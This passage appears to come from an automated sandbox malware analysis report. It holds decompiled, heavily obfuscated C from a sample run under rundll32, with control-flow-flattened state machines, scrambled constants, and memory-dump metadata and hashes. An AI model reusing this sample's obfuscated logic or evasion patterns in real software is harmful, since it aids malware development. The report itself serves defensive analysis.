                                                                                                                    								E0033A8B0(_v428, _t587, _v372);
                                                                                                                    								_t694 =  &(_t694[5]);
                                                                                                                    								_t686 = 0x488924;
                                                                                                                    								L12:
                                                                                                                    								_t610 = _v456;
                                                                                                                    								while(1) {
                                                                                                                    									L1:
                                                                                                                    									_t551 = 0xf168e34;
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							if(_t686 != 0x57ff6e7) {
                                                                                                                    								if(_t686 == 0x5f676f3) {
                                                                                                                    									_t598 = E00340AE0(8, 1);
                                                                                                                    									_push(_v516);
                                                                                                                    									_t682 = _t598;
                                                                                                                    									_push( &_v288);
                                                                                                                    									_push(_t682);
                                                                                                                    									_push(9);
                                                                                                                    									E003380E3(_v380, _v484);
                                                                                                                    									_t686 = 0x7f96e60;
                                                                                                                    									L11:
                                                                                                                    									_t694 =  &(_t694[6]);
                                                                                                                    									goto L12;
                                                                                                                    								} else {
                                                                                                                    									if(_t686 != 0x618a3a9) {
                                                                                                                    										goto L28;
                                                                                                                    									} else {
                                                                                                                    										_t686 = 0x5f676f3;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								L30:
                                                                                                                    								return _t595;
                                                                                                                    							}
                                                                                                                    							_t682 = 0x4000;
                                                                                                                    							_push(_t610);
                                                                                                                    							_push(_t610);
                                                                                                                    							_t595 = E00337FF2(0x4000);
                                                                                                                    							_v300 = _t595;
                                                                                                                    							__eflags = _t595;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								_t686 = 0x123a276;
                                                                                                                    								goto L12;
                                                                                                                    							}
                                                                                                                    							goto L30;
                                                                                                                    						}
                                                                                                                    						__eflags = _t686 - 0x7f96e60;
                                                                                                                    						if(_t686 == 0x7f96e60) {
                                                                                                                    							_t554 = E00340AE0(0x10, 4);
                                                                                                                    							_push(_v396);
                                                                                                                    							_t682 = _t554;
                                                                                                                    							_push( &_v128);
                                                                                                                    							_push(_t682);
                                                                                                                    							_push(0xb);
                                                                                                                    							E003380E3(_v504, _v388);
                                                                                                                    							_t610 = _v456;
                                                                                                                    							_t694 =  &(_t694[6]);
                                                                                                                    							_t686 = 0x8d9b717;
                                                                                                                    							_t551 = 0xf168e34;
                                                                                                                    							goto L28;
                                                                                                                    						} else {
                                                                                                                    							__eflags = _t686 - 0x8d9b717;
                                                                                                                    							if(_t686 == 0x8d9b717) {
                                                                                                                    								_t687 =  &_v256;
                                                                                                                    								_t659 = E00340AE0(0x10, 8);
                                                                                                                    								_t560 = _v308;
                                                                                                                    								__eflags = _t560 - _t659;
                                                                                                                    								if(_t560 < _t659) {
                                                                                                                    									_t675 = _t659 - _t560;
                                                                                                                    									_t683 = _t687;
                                                                                                                    									_t634 = _t675 >> 1;
                                                                                                                    									__eflags = _t634;
                                                                                                                    									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
                                                                                                                    									asm("adc ecx, ecx");
                                                                                                                    									_t687 = _t687 + _t675 * 2;
                                                                                                                    									memset(_t683 + _t634, _t566, 0);
                                                                                                                    									_t694 =  &(_t694[6]);
                                                                                                                    								}
                                                                                                                    								_t563 = E00340AE0(0x10, 8);
                                                                                                                    								_push(_v384);
                                                                                                                    								_t682 = _t563;
                                                                                                                    								_push(_t687);
                                                                                                                    								_push(_t682);
                                                                                                                    								_push(0xb);
                                                                                                                    								E003380E3(_v352, _v340);
                                                                                                                    								_t686 = 0x57ff6e7;
                                                                                                                    								goto L11;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t686 - 0xa9d081a;
                                                                                                                    								if(_t686 == 0xa9d081a) {
                                                                                                                    									E0033ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
                                                                                                                    									_t610 = _v456;
                                                                                                                    									_t694 =  &(_t694[3]);
                                                                                                                    									_t686 = 0x7498ebf;
                                                                                                                    									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                    									goto L1;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t686 - 0xe639f63;
                                                                                                                    									if(_t686 == 0xe639f63) {
                                                                                                                    										E00348519(_v416, _v464, _v300);
                                                                                                                    										return 0;
                                                                                                                    									}
                                                                                                                    									__eflags = _t686 - _t551;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										goto L28;
                                                                                                                    									} else {
                                                                                                                    										_push(_v476);
                                                                                                                    										_push(_v420);
                                                                                                                    										_v292 = _t682 + _t693;
                                                                                                                    										_push(_v356);
                                                                                                                    										_t603 = E0034C0C1( &_v128, __eflags,  &_v288, E00348606(_v492, 0x331610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
                                                                                                                    										E0033A8B0(_v400, _t572, _v376);
                                                                                                                    										_t694 =  &(_t694[0xd]);
                                                                                                                    										_t686 = 0xa9d081a;
                                                                                                                    										goto L12;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						goto L30;
                                                                                                                    						L28:
                                                                                                                    						__eflags = _t686 - 0x7bf1275;
                                                                                                                    					} while (__eflags != 0);
                                                                                                                    					L29:
                                                                                                                    					return _v300;
                                                                                                                    				}
                                                                                                                    			}
                                                                                                                    0x0034f9a3
                                                                                                                    0x0034f9ae
                                                                                                                    0x0034f9b9
                                                                                                                    0x0034f9c1
                                                                                                                    0x0034f9c6
                                                                                                                    0x0034f9ca
                                                                                                                    0x0034f9cf
                                                                                                                    0x0034f9d7
                                                                                                                    0x0034f9e4
                                                                                                                    0x0034f9e8
                                                                                                                    0x0034f9ed
                                                                                                                    0x0034f9f2
                                                                                                                    0x0034f9fa
                                                                                                                    0x0034fa05
                                                                                                                    0x0034fa10
                                                                                                                    0x0034fa1b
                                                                                                                    0x0034fa26
                                                                                                                    0x0034fa31
                                                                                                                    0x0034fa3c
                                                                                                                    0x0034fa47
                                                                                                                    0x0034fa52
                                                                                                                    0x0034fa5d
                                                                                                                    0x0034fa68
                                                                                                                    0x0034fa73
                                                                                                                    0x0034fa7b
                                                                                                                    0x0034fa8b
                                                                                                                    0x0034fa8f
                                                                                                                    0x0034fa97
                                                                                                                    0x0034faa7
                                                                                                                    0x0034faab
                                                                                                                    0x0034fab0
                                                                                                                    0x0034fab5
                                                                                                                    0x0034fabd
                                                                                                                    0x0034fac5
                                                                                                                    0x0034facd
                                                                                                                    0x0034fad2
                                                                                                                    0x0034fada
                                                                                                                    0x0034fae2
                                                                                                                    0x0034faea
                                                                                                                    0x0034faf2
                                                                                                                    0x0034fafa
                                                                                                                    0x0034fb05
                                                                                                                    0x0034fb0d
                                                                                                                    0x0034fb18
                                                                                                                    0x0034fb25
                                                                                                                    0x0034fb29
                                                                                                                    0x0034fb31
                                                                                                                    0x0034fb39
                                                                                                                    0x0034fb41
                                                                                                                    0x0034fb49
                                                                                                                    0x0034fb4e
                                                                                                                    0x0034fb5c
                                                                                                                    0x0034fb62
                                                                                                                    0x0034fb6a
                                                                                                                    0x0034fb79
                                                                                                                    0x0034fb7c
                                                                                                                    0x0034fb83
                                                                                                                    0x0034fb87
                                                                                                                    0x0034fb8c
                                                                                                                    0x0034fb94
                                                                                                                    0x0034fbaa
                                                                                                                    0x0034fbb1
                                                                                                                    0x0034fbb8
                                                                                                                    0x0034fbc3
                                                                                                                    0x0034fbd0
                                                                                                                    0x0034fbd1
                                                                                                                    0x0034fbda
                                                                                                                    0x0034fbde
                                                                                                                    0x0034fbe6
                                                                                                                    0x0034fbee
                                                                                                                    0x0034fc03
                                                                                                                    0x0034fc07
                                                                                                                    0x0034fc0f
                                                                                                                    0x0034fc17
                                                                                                                    0x0034fc24
                                                                                                                    0x0034fc28
                                                                                                                    0x0034fc30
                                                                                                                    0x0034fc35
                                                                                                                    0x0034fc3d
                                                                                                                    0x0034fc45
                                                                                                                    0x0034fc4a
                                                                                                                    0x0034fc52
                                                                                                                    0x0034fc5a
                                                                                                                    0x0034fc62
                                                                                                                    0x0034fc67
                                                                                                                    0x0034fc6f
                                                                                                                    0x0034fc74
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc81
                                                                                                                    0x0034fc87
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034fc8d
                                                                                                                    0x0034ffc3
                                                                                                                    0x0034ffcc
                                                                                                                    0x0034ffd3
                                                                                                                    0x0035000b
                                                                                                                    0x0035001f
                                                                                                                    0x00350024
                                                                                                                    0x00350030
                                                                                                                    0x00350032
                                                                                                                    0x00000000
                                                                                                                    0x00350032
                                                                                                                    0x0034fc99
                                                                                                                    0x0034fdb2
                                                                                                                    0x0034fdc5
                                                                                                                    0x0034fdc6
                                                                                                                    0x0034fdcc
                                                                                                                    0x0034fdd4
                                                                                                                    0x0034fdd6
                                                                                                                    0x0034fddc
                                                                                                                    0x0034fde0
                                                                                                                    0x00000000
                                                                                                                    0x0034fde0
                                                                                                                    0x0034fca5
                                                                                                                    0x0034fd4c
                                                                                                                    0x0034fd55
                                                                                                                    0x0034fd60
                                                                                                                    0x0034fd75
                                                                                                                    0x0034fd76
                                                                                                                    0x0034fd77
                                                                                                                    0x0034fd78
                                                                                                                    0x0034fd8a
                                                                                                                    0x0034fd9c
                                                                                                                    0x0034fda1
                                                                                                                    0x0034fda4
                                                                                                                    0x0034fd0b
                                                                                                                    0x0034fd0b
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x00000000
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fc7c
                                                                                                                    0x0034fcb1
                                                                                                                    0x0034fcb9
                                                                                                                    0x0034fcdd
                                                                                                                    0x0034fce2
                                                                                                                    0x0034fcea
                                                                                                                    0x0034fcfa
                                                                                                                    0x0034fcfb
                                                                                                                    0x0034fcfc
                                                                                                                    0x0034fcfe
                                                                                                                    0x0034fd03
                                                                                                                    0x0034fd08
                                                                                                                    0x0034fd08
                                                                                                                    0x00000000
                                                                                                                    0x0034fcbb
                                                                                                                    0x0034fcc1
                                                                                                                    0x00000000
                                                                                                                    0x0034fcc7
                                                                                                                    0x0034fcc7
                                                                                                                    0x00000000
                                                                                                                    0x0034fcc7
                                                                                                                    0x0034fcc1
                                                                                                                    0x0034ffc2
                                                                                                                    0x0034ffc2
                                                                                                                    0x0034ffc2
                                                                                                                    0x0034fd1b
                                                                                                                    0x0034fd2d
                                                                                                                    0x0034fd2e
                                                                                                                    0x0034fd2f
                                                                                                                    0x0034fd34
                                                                                                                    0x0034fd3d
                                                                                                                    0x0034fd3f
                                                                                                                    0x0034fd45
                                                                                                                    0x00000000
                                                                                                                    0x0034fd45
                                                                                                                    0x00000000
                                                                                                                    0x0034fd3f
                                                                                                                    0x0034fde8
                                                                                                                    0x0034fdee
                                                                                                                    0x0034ff6b
                                                                                                                    0x0034ff70
                                                                                                                    0x0034ff7e
                                                                                                                    0x0034ff8b
                                                                                                                    0x0034ff8c
                                                                                                                    0x0034ff8d
                                                                                                                    0x0034ff8f
                                                                                                                    0x0034ff94
                                                                                                                    0x0034ff98
                                                                                                                    0x0034ff9b
                                                                                                                    0x0034ffa0
                                                                                                                    0x00000000
                                                                                                                    0x0034fdf4
                                                                                                                    0x0034fdf4
                                                                                                                    0x0034fdfa
                                                                                                                    0x0034fede
                                                                                                                    0x0034fef5
                                                                                                                    0x0034fef7
                                                                                                                    0x0034ff00
                                                                                                                    0x0034ff02
                                                                                                                    0x0034ff04
                                                                                                                    0x0034ff06
                                                                                                                    0x0034ff0f
                                                                                                                    0x0034ff0f
                                                                                                                    0x0034ff11
                                                                                                                    0x0034ff13
                                                                                                                    0x0034ff15
                                                                                                                    0x0034ff18
                                                                                                                    0x0034ff18
                                                                                                                    0x0034ff18
                                                                                                                    0x0034ff2a
                                                                                                                    0x0034ff2f
                                                                                                                    0x0034ff3d
                                                                                                                    0x0034ff46
                                                                                                                    0x0034ff47
                                                                                                                    0x0034ff48
                                                                                                                    0x0034ff4a
                                                                                                                    0x0034ff4f
                                                                                                                    0x00000000
                                                                                                                    0x0034fe00
                                                                                                                    0x0034fe00
                                                                                                                    0x0034fe06
                                                                                                                    0x0034febe

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                    • API String ID: 0-2624470838
                                                                                                                    • Opcode ID: 641744f5f120c46d8864325ad3b0307f45d566c665ef4614694ed1381a905e45
                                                                                                                    • Instruction ID: a04724a07bec9aea67314d24c70eb4d6528cc20c6f838da04456c11b0d32ba09
                                                                                                                    • Opcode Fuzzy Hash: 641744f5f120c46d8864325ad3b0307f45d566c665ef4614694ed1381a905e45
                                                                                                                    • Instruction Fuzzy Hash: FB5231719093818FD3B9CF25C58AB8BFBE1BBC5348F10891DE1999A260D7B49949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E0033D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				char _v4;
                                                                                                                    				char _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				intOrPtr* _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				unsigned int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				intOrPtr _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				intOrPtr _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				void* __ecx;
                                                                                                                    				intOrPtr _t400;
                                                                                                                    				void* _t407;
                                                                                                                    				signed int _t410;
                                                                                                                    				intOrPtr _t421;
                                                                                                                    				signed int _t423;
                                                                                                                    				signed int _t424;
                                                                                                                    				signed int _t425;
                                                                                                                    				signed int _t426;
                                                                                                                    				signed int _t427;
                                                                                                                    				signed int _t428;
                                                                                                                    				signed int _t429;
                                                                                                                    				signed int _t430;
                                                                                                                    				signed int _t431;
                                                                                                                    				signed int _t432;
                                                                                                                    				signed int _t433;
                                                                                                                    				intOrPtr _t434;
                                                                                                                    				void* _t473;
                                                                                                                    				intOrPtr* _t482;
                                                                                                                    				signed int _t485;
                                                                                                                    				signed int* _t491;
                                                                                                                    				void* _t493;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_v16 = __edx;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(__edx);
                                                                                                                    				_v72 = 0xfd05e7;
                                                                                                                    				_t491 =  &(( &_v192)[6]);
                                                                                                                    				_v72 = _v72 | 0xfdc7c414;
                                                                                                                    				_v72 = _v72 ^ 0xfdffc5f6;
                                                                                                                    				_t489 = 0;
                                                                                                                    				_v128 = 0x159cf;
                                                                                                                    				_t421 = 0;
                                                                                                                    				_v128 = _v128 + 0x2543;
                                                                                                                    				_t485 = 0x8939926;
                                                                                                                    				_v128 = _v128 ^ 0xc1c453fb;
                                                                                                                    				_v128 = _v128 ^ 0xc1c52ce8;
                                                                                                                    				_v188 = 0xc0a375;
                                                                                                                    				_t423 = 0x5a;
                                                                                                                    				_v188 = _v188 / _t423;
                                                                                                                    				_v188 = _v188 + 0xf5e3;
                                                                                                                    				_v188 = _v188 + 0xffffba7d;
                                                                                                                    				_v188 = _v188 ^ 0x0002d452;
                                                                                                                    				_v192 = 0xeb0e91;
                                                                                                                    				_v192 = _v192 << 0xb;
                                                                                                                    				_v192 = _v192 >> 0xd;
                                                                                                                    				_v192 = _v192 | 0x4be38997;
                                                                                                                    				_v192 = _v192 ^ 0x4be25280;
                                                                                                                    				_v52 = 0x3397e5;
                                                                                                                    				_v52 = _v52 ^ 0x345a01ed;
                                                                                                                    				_v52 = _v52 ^ 0x346a35aa;
                                                                                                                    				_v60 = 0x140ff9;
                                                                                                                    				_t424 = 6;
                                                                                                                    				_v60 = _v60 / _t424;
                                                                                                                    				_v60 = _v60 ^ 0x000ad59a;
                                                                                                                    				_v168 = 0x6059cb;
                                                                                                                    				_t425 = 0x1a;
                                                                                                                    				_v168 = _v168 * 0x7f;
                                                                                                                    				_v168 = _v168 / _t425;
                                                                                                                    				_v168 = _v168 * 0x21;
                                                                                                                    				_v168 = _v168 ^ 0x3ca5e455;
                                                                                                                    				_v112 = 0x1e6ccd;
                                                                                                                    				_v112 = _v112 << 0xc;
                                                                                                                    				_v112 = _v112 + 0xffff3925;
                                                                                                                    				_v112 = _v112 ^ 0xe6c2746b;
                                                                                                                    				_v44 = 0xb8d15a;
                                                                                                                    				_v44 = _v44 >> 0xb;
                                                                                                                    				_v44 = _v44 ^ 0x0008fc1e;
                                                                                                                    				_v172 = 0x2478d;
                                                                                                                    				_v172 = _v172 ^ 0x68bbc6f8;
                                                                                                                    				_v172 = _v172 >> 0xc;
                                                                                                                    				_v172 = _v172 | 0x6f66efc5;
                                                                                                                    				_v172 = _v172 ^ 0x6f64ef75;
                                                                                                                    				_v116 = 0x51a99f;
                                                                                                                    				_v116 = _v116 | 0x1f129b6c;
                                                                                                                    				_v116 = _v116 ^ 0xc118cdce;
                                                                                                                    				_v116 = _v116 ^ 0xde47442a;
                                                                                                                    				_v132 = 0x216e1a;
                                                                                                                    				_v132 = _v132 + 0xffff43fb;
                                                                                                                    				_v132 = _v132 ^ 0x7008f7db;
                                                                                                                    				_v132 = _v132 ^ 0x702542ff;
                                                                                                                    				_v84 = 0xc91edc;
                                                                                                                    				_t426 = 0x5e;
                                                                                                                    				_v84 = _v84 / _t426;
                                                                                                                    				_v84 = _v84 ^ 0x0006a22a;
                                                                                                                    				_v164 = 0xa7de11;
                                                                                                                    				_v164 = _v164 + 0xffff6841;
                                                                                                                    				_v164 = _v164 >> 4;
                                                                                                                    				_v164 = _v164 << 3;
                                                                                                                    				_v164 = _v164 ^ 0x005f8816;
                                                                                                                    				_v108 = 0xdd6066;
                                                                                                                    				_v108 = _v108 >> 8;
                                                                                                                    				_v108 = _v108 << 8;
                                                                                                                    				_v108 = _v108 ^ 0x00d87344;
                                                                                                                    				_v92 = 0x21cc88;
                                                                                                                    				_v92 = _v92 ^ 0xd81b96af;
                                                                                                                    				_v92 = _v92 ^ 0xd8329727;
                                                                                                                    				_v96 = 0xbd6d4e;
                                                                                                                    				_t427 = 0x26;
                                                                                                                    				_v96 = _v96 / _t427;
                                                                                                                    				_v96 = _v96 ^ 0x00061825;
                                                                                                                    				_v24 = 0x6502ac;
                                                                                                                    				_v24 = _v24 << 4;
                                                                                                                    				_v24 = _v24 ^ 0x065de4e3;
                                                                                                                    				_v56 = 0x642336;
                                                                                                                    				_v56 = _v56 + 0xffffd3db;
                                                                                                                    				_v56 = _v56 ^ 0x006ffb84;
                                                                                                                    				_v68 = 0x348f1;
                                                                                                                    				_t428 = 0x55;
                                                                                                                    				_v68 = _v68 / _t428;
                                                                                                                    				_v68 = _v68 ^ 0x0008f449;
                                                                                                                    				_v76 = 0x3c74f1;
                                                                                                                    				_v76 = _v76 + 0xffff407e;
                                                                                                                    				_v76 = _v76 ^ 0x003b6445;
                                                                                                                    				_v88 = 0xc452b0;
                                                                                                                    				_v88 = _v88 + 0xffff3a6d;
                                                                                                                    				_v88 = _v88 ^ 0x00c8dd7a;
                                                                                                                    				_v48 = 0xc68c2;
                                                                                                                    				_t429 = 0x57;
                                                                                                                    				_v48 = _v48 / _t429;
                                                                                                                    				_v48 = _v48 ^ 0x0008f98a;
                                                                                                                    				_v100 = 0x631361;
                                                                                                                    				_v100 = _v100 | 0x5af5ab8e;
                                                                                                                    				_v100 = _v100 ^ 0x5affcbc5;
                                                                                                                    				_v148 = 0x1761a;
                                                                                                                    				_v148 = _v148 ^ 0xebf93349;
                                                                                                                    				_v148 = _v148 >> 4;
                                                                                                                    				_v148 = _v148 ^ 0x0eb625e6;
                                                                                                                    				_v40 = 0xe5378a;
                                                                                                                    				_v40 = _v40 >> 2;
                                                                                                                    				_v40 = _v40 ^ 0x003c8b43;
                                                                                                                    				_v140 = 0x73545;
                                                                                                                    				_t430 = 0x61;
                                                                                                                    				_v140 = _v140 * 0x21;
                                                                                                                    				_v140 = _v140 / _t430;
                                                                                                                    				_v140 = _v140 ^ 0x0002b6d6;
                                                                                                                    				_v80 = 0x39d04;
                                                                                                                    				_v80 = _v80 >> 4;
                                                                                                                    				_v80 = _v80 ^ 0x00009cd0;
                                                                                                                    				_v156 = 0x1ba0aa;
                                                                                                                    				_v156 = _v156 + 0x716e;
                                                                                                                    				_v156 = _v156 << 0xd;
                                                                                                                    				_v156 = _v156 ^ 0xb6bcbcaf;
                                                                                                                    				_v156 = _v156 ^ 0x34f57f5f;
                                                                                                                    				_v20 = 0xda4179;
                                                                                                                    				_t431 = 0x27;
                                                                                                                    				_t482 = _v16;
                                                                                                                    				_v20 = _v20 / _t431;
                                                                                                                    				_v20 = _v20 ^ 0x00092493;
                                                                                                                    				_v32 = 0x6dc25;
                                                                                                                    				_v32 = _v32 >> 0xf;
                                                                                                                    				_v32 = _v32 ^ 0x0008149e;
                                                                                                                    				_v180 = 0x3ec4dc;
                                                                                                                    				_v180 = _v180 >> 5;
                                                                                                                    				_t432 = 0x70;
                                                                                                                    				_v180 = _v180 / _t432;
                                                                                                                    				_v180 = _v180 + 0xffff18e8;
                                                                                                                    				_v180 = _v180 ^ 0xfff4c632;
                                                                                                                    				_v64 = 0xea19a3;
                                                                                                                    				_v64 = _v64 | 0xee52e837;
                                                                                                                    				_v64 = _v64 ^ 0xeef909eb;
                                                                                                                    				_v28 = 0xcaf9fa;
                                                                                                                    				_v28 = _v28 >> 0xe;
                                                                                                                    				_v28 = _v28 ^ 0x000e6f4e;
                                                                                                                    				_v120 = 0x563e36;
                                                                                                                    				_v120 = _v120 >> 0xe;
                                                                                                                    				_v120 = _v120 << 5;
                                                                                                                    				_v120 = _v120 ^ 0x00027d23;
                                                                                                                    				_v176 = 0x87c40f;
                                                                                                                    				_v176 = _v176 ^ 0xb401f56c;
                                                                                                                    				_v176 = _v176 + 0xffff7429;
                                                                                                                    				_v176 = _v176 | 0xf3ec0d69;
                                                                                                                    				_v176 = _v176 ^ 0xf7eb47c6;
                                                                                                                    				_v184 = 0x47488d;
                                                                                                                    				_v184 = _v184 >> 0xf;
                                                                                                                    				_v184 = _v184 << 0xf;
                                                                                                                    				_v184 = _v184 << 1;
                                                                                                                    				_v184 = _v184 ^ 0x0086c0ad;
                                                                                                                    				_v136 = 0xb24629;
                                                                                                                    				_v136 = _v136 | 0x7ef33f67;
                                                                                                                    				_v136 = _v136 ^ 0x7ef17c1c;
                                                                                                                    				_v144 = 0xba01aa;
                                                                                                                    				_v144 = _v144 | 0x3cf3a1ff;
                                                                                                                    				_v144 = _v144 ^ 0x3cf83085;
                                                                                                                    				_v124 = 0xbe6d5e;
                                                                                                                    				_v124 = _v124 + 0xffff96e9;
                                                                                                                    				_v124 = _v124 | 0xcf3d3218;
                                                                                                                    				_v124 = _v124 ^ 0xcfb1306a;
                                                                                                                    				_v36 = 0xa69a94;
                                                                                                                    				_v36 = _v36 + 0xffffed5e;
                                                                                                                    				_v36 = _v36 ^ 0x00a0b8ce;
                                                                                                                    				_v104 = 0xa8033b;
                                                                                                                    				_t433 = 9;
                                                                                                                    				_v104 = _v104 / _t433;
                                                                                                                    				_v104 = _v104 >> 6;
                                                                                                                    				_v104 = _v104 ^ 0x0005e2c3;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t434 = _v160;
                                                                                                                    					while(1) {
                                                                                                                    						_t400 = _v152;
                                                                                                                    						while(1) {
                                                                                                                    							L3:
                                                                                                                    							_t493 = _t485 - 0xa1723c1;
                                                                                                                    							if(_t493 > 0) {
                                                                                                                    								goto L19;
                                                                                                                    							}
                                                                                                                    							L4:
                                                                                                                    							if(_t493 == 0) {
                                                                                                                    								E00348519(_v144, _v124, _t489);
                                                                                                                    								_t485 = 0x4b7559b;
                                                                                                                    								goto L17;
                                                                                                                    							} else {
                                                                                                                    								if(_t485 == 0x4b7559b) {
                                                                                                                    									return E00348519(_v36, _v104, _t421);
                                                                                                                    								}
                                                                                                                    								if(_t485 == 0x4ed616e) {
                                                                                                                    									_t441 = _v172;
                                                                                                                    									_t407 = E003416AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
                                                                                                                    									_t491 =  &(_t491[0x12]);
                                                                                                                    									if(_t407 == 0) {
                                                                                                                    										L16:
                                                                                                                    										_t485 = 0xa1723c1;
                                                                                                                    										L17:
                                                                                                                    										_t400 = _v152;
                                                                                                                    									} else {
                                                                                                                    										_t410 = E0034D25E(_t441);
                                                                                                                    										_t485 = 0x9a40434;
                                                                                                                    										_t400 = _v12 * 0x2c + _t421;
                                                                                                                    										_v152 = _t400;
                                                                                                                    										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
                                                                                                                    									}
                                                                                                                    									_t434 = _v160;
                                                                                                                    									_t473 = 0x6a50b97;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t485 == _t473) {
                                                                                                                    										E00342007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
                                                                                                                    										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
                                                                                                                    										_t400 = E00348F9E(_v32, _v180, _v64, _v28, _v160);
                                                                                                                    										_t491 =  &(_t491[0xb]);
                                                                                                                    										L30:
                                                                                                                    										_t473 = 0x6a50b97;
                                                                                                                    										goto L31;
                                                                                                                    									} else {
                                                                                                                    										if(_t485 == 0x8939926) {
                                                                                                                    											_t485 = 0xe60f9b1;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											if(_t485 != 0x9a40434) {
                                                                                                                    												L31:
                                                                                                                    												if(_t485 != 0x88fb243) {
                                                                                                                    													goto L1;
                                                                                                                    												}
                                                                                                                    											} else {
                                                                                                                    												_t434 = E003342C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
                                                                                                                    												_t491 =  &(_t491[5]);
                                                                                                                    												_v160 = _t434;
                                                                                                                    												_t473 = 0x6a50b97;
                                                                                                                    												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
                                                                                                                    												_t400 = _v152;
                                                                                                                    												while(1) {
                                                                                                                    													L3:
                                                                                                                    													_t493 = _t485 - 0xa1723c1;
                                                                                                                    													if(_t493 > 0) {
                                                                                                                    														goto L19;
                                                                                                                    													}
                                                                                                                    													goto L4;
                                                                                                                    												}
                                                                                                                    												goto L19;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L34:
                                                                                                                    							return _t400;
                                                                                                                    							L19:
                                                                                                                    							if(_t485 == 0xaf524c8) {
                                                                                                                    								_push(_t434);
                                                                                                                    								_push(_t434);
                                                                                                                    								_t400 = E00337FF2(0x2000);
                                                                                                                    								_t489 = _t400;
                                                                                                                    								if(_t400 == 0) {
                                                                                                                    									_t485 = 0x4b7559b;
                                                                                                                    									goto L30;
                                                                                                                    								} else {
                                                                                                                    									_t485 = 0x4ed616e;
                                                                                                                    									goto L17;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t485 == 0xb29ddc7) {
                                                                                                                    									_t482 = _t482 + 0x2c;
                                                                                                                    									asm("sbb esi, esi");
                                                                                                                    									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									_t400 = 0xd1a593f;
                                                                                                                    									if(_t485 == 0xd1a593f) {
